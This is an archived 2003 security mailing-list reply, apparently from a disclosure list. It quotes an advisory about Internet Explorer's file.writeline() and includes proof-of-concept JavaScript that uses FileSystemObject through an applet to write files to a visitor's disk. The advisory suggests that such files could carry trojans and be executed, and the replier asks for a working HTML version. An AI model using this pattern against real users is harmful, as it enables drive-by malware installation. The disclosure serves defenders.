Re: Internet Explorer JavaScript insecure function
From: npguy (npguy_at_websurfer.com.np)
Date: 12/09/03
- Previous message: Roland Postle: "Re: locating default signal handler for SIGSEGV"
- In reply to: FREEBRAIN: "Internet Explorer JavaScript insecure function"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 9 Dec 2003 08:01:10 +0545 To: "FREEBRAIN" <freebrain@unionnewbies.net>
Hi freebrain,
exploit not working in ie6.
urs `Proof of concept` require `applet`
in html. could u please post an html?
Sunday, December 7, 2003, 8:41:57 PM, you wrote:
F> * Internet Explorer JavaScript insecure function *
F> Product: Microsoft Internet Explorer
F> Version: 5.x (probabily other versions may be affected)
F> ***
F> Problem:
F> I discovered a javascript function (interpreted by Internet Explorer) called
F> "file.writeline()" may be
F> potentially dangerous for Internet Explorer users. This function allows to
F> write files by means of
F> JavaScript on a hard disk.
F> An attacker may use this function writting JavaScript code in posts of
F> forums, guestbooks, etc for owning
F> his victim's computers. With "file.writeline()" function the attacker can
F> write trojans/virus/etc on his
F> victim's hard disks, for example, an attacker may use JavaScript
F> "file.writeline()" function for writting
F> a malicious file in VBS (Visual Basic Scripting) language.
F> I repeat, this may be potentially dangerous for Internet Explorer users.
F> NOTE: Actually a virus in the wild that affects to mIRC users is using this
F> function ("file.writeline").
F> NOTE2: As you can see on the "Proof of concept", other functions are needed
F> to carry out an "intrusion".
F> ***
F> Proof of concept:
F> InterfaceObject=document.applets[0];
F> setTimeout("Write()",1000);
F> function Write() {
F> fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
F> InterfaceObject.setCLSID(fsoClassID);
F> fso = InterfaceObject.createInstance();
F> // windir = fso.getspecialfolder ;
F> filename = "\\proof.txt";
F> var filecontent = "Hello world";
F> file = fso.opentextfile(filename, "2", "TRUE");
F> file.writeline(filecontent)
F> file.close();
F> }
F> This code writes a file called "proof.txt" in the hard disk, with the
F> content "Hello world". Also you can
F> execute files you write by means of JavaScript adding "Run();" to the
F> function.
F> ***
F> Solution:
F> I'm not sure about the solution but I recommend to upgrade to the last
F> version of Internet Explorer.
F> Also I recommend webmasters to forbid HTML codes that content this function
F> in their forums, guestbooks, etc.
F> ***
F> Thanks to:
F> #disidents,#hackers,#hacker @ irc-phoenix.org
F> #disidents,#sleepx,#ayuda_internet @ irc-hispano.org
F> Special thanks go to: Impos, |_Tr0mP4s
F> (sorry my poor english)
F> ***
F> By FREEBRAIN
F> FREEBRAIN is a member of DisidentS Hacker Team
F> http://disidents-team.cjb.net (under construction) -
F> http://www.gratisweb.com/disidents
F> <freebrain@unionnewbies.net> ( www.unionnewbies.net )
- Previous message: Roland Postle: "Re: locating default signal handler for SIGSEGV"
- In reply to: FREEBRAIN: "Internet Explorer JavaScript insecure function"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
